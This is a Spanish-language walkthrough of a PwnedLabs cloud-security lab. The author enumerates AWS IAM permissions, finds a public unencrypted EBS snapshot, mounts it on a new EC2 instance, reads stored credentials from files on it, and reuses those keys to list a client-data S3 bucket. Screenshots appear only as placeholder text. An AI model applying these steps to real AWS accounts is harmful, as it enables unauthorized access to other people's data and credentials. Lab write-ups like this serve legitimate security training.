PwnedLabs Loot public ebs snapshot

PwnedLabs Loot public ebs snapshot


Linux

Lo primero que hacemos es configurar nuestra cuenta

ssh_command.

aws configure --profile pwnedlabs

aws sts get-caller-identity --profile pwnedlabs

ssh_command.

La ultima foto nos dice que estamos en el aws iam con el usuario llamado intern.

Despues trato de ver si puedo listar los objetos en el bucket. Pero parece que no tengo acceso.

aws s3 ls --profile pwnedlabs

ssh_command.

aws iam list-attached-user-policies --user-name intern

ssh_command.

aws iam get-policy --policy-arn arn:aws:iam::104506445608:policy/PublicSnapper --profile pwnedlabs

ssh_command.

aws iam get-policy-version --policy-arn arn:aws:iam::104506445608:policy/PublicSnapper --profile pwnedlabs --version-id v9

ssh_command. ssh_command.

aws ec2 describe-snapshots --owner-ids 104506445608 --region us-east-1 --profile pwnedlabs

ssh_command.

aws ec2 describe-snapshots --owner-ids 104506445608 --region us-east-1 -profile pwnedlabs | grep -i SnapshotId | head -1 | xclip -sel clip

aws ec2 describe-snapshot-attribute --attribute createVolumePermission --region us-east-1 ---snapshot-id snap-0c0679098c7a4e636

ssh_command.

Vemos quien tiene permisos para crear volumenes y tambien antes que la opcion de Encrypted : false.

Ahora vemos que se despliega Group:all que significa que el snapshot es publico y cualquier usuario puede crear un volume de ese snapshot en su cuenta de AWS.

Le damos click a EC2

ssh_command.

Le damos click a snapshots

ssh_command.

Seleccionamos Public snapshots y buscamos Snapshot ID = snap-0c0679098c7a4e636

ssh_command.

Podemos ver que se tiene acceso por ser una imagen publica y tambien que no esta encriptada.

ssh_command.

Le damos click a Actions -> Create volume from snapshot

ssh_command.

Le damos click a Create volume.

ssh_command.

Nos dirigimos a volumes

ssh_command.

Nos aseguramos que el Volume este disponible

ssh_command.

Le damos click a Launch Instance

ssh_command.

Le damos un nombre y todo el resto debe ser por defecto

ssh_command.

Escogemos seguir sin un key pair

Y en la subnet escogemos una que esta en el Availability Zone: us-east-1a

ssh_command.

Le damos click a Launch Instance

ssh_command.

Vamos al menu y escogemos Volumes y despues le damos click a attach volume

ssh_command.

Le damos click en attached volumes

ssh_command.

Escogemos Ebspwned y le damos click a connect

ssh_command.

lsblk

mkdir mnt

sudo su

mount -t ext4 /dev/xvdf1 mnt

cd mnt

ls -ahl

ssh_command.

cd home

ls -ahl

cd practice_files

ls -ahl

cat s3_download_file.php

ssh_command.

cat s3_download_file.php

ssh_command.

batcat creds

aws configure --profile pwnedlabs

aws sts get-caller-identity --profile pwnlabs

ssh_command.

aws s3 ls ecorp-client-data

ssh_command.

© 2024 Cu3rv0x